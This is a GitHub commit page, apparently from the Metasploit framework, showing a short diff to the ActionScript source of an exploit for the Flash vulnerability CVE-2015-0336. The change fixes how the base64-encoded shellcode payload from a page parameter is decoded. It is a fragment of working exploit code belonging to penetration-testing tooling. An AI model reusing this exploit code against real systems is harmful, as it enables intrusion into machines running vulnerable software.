We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 23d244b commit 19c7445Copy full SHA for 19c7445
data/exploits/CVE-2015-0336/msf.swf
61 Bytes
external/source/exploits/CVE-2015-0336/Msf.as
@@ -32,8 +32,11 @@ package
32
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
33
34
public function Msf() {
35
- b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
36
- payload = b64.toByteArray().toString();
+ var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+ var pattern:RegExp = / /g;
37
+ b64_payload = b64_payload.replace(pattern, "+")
38
+ b64.decode(b64_payload)
39
+ payload = b64.toByteArray().toString()
40
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
41
42
ba.endian = "littleEndian"
0 commit comments